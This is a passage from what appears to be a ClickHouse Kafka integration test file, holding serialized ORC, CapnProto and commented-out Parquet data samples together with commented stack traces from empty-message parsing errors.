b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
# 'Parquet' : {
# not working at all with Kafka: DB::Exception: IOError: Invalid Parquet file size is 0 bytes
# /contrib/libcxx/include/exception:129: std::exception::capture() @ 0x15c33fe8 in /usr/bin/clickhouse
# /contrib/libcxx/include/exception:109: std::exception::exception() @ 0x15c33fb5 in /usr/bin/clickhouse
# /contrib/poco/Foundation/src/Exception.cpp:27: Poco::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x21877833 in /usr/bin/clickhouse
# /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:70: DB::ParquetBlockInputFormat::prepareReader() @ 0x1df2b0c2 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:36: DB::ParquetBlockInputFormat::ParquetBlockInputFormat(DB::ReadBuffer&, DB::Block) @ 0x1df2af8b in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ParquetBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, 0ul, 1ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>, std::__1::__tuple_indices<0ul, 1ul>) @ 0x1df2dc88 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ParquetBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ParquetBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>) @ 0x1df2d9c8 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ParquetBlockInputFormat, std::__1::allocator<DB::ParquetBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&>(std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ReadBuffer&, DB::Block const&) @ 0x1df2d687 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ParquetBlockInputFormat>::value), std::__1::shared_ptr<DB::ParquetBlockInputFormat> >::type std::__1::make_shared<DB::ParquetBlockInputFormat, DB::ReadBuffer&, DB::Block const&>(DB::ReadBuffer&, DB::Block const&) @ 0x1df2d455 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:95: DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1df2cec7 in /usr/bin/clickhouse
# /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ce6a in /usr/bin/clickhouse
# /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2cd7d in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ccda in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2bdec in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:63: DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*) @ 0x1c9e9fc7 in /usr/bin/clickhouse
# /src/Storages/Kafka/StorageKafka.cpp:565: DB::StorageKafka::streamToViews() @ 0x1d8cc3fa in /usr/bin/clickhouse
# # 'data_sample' : [
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04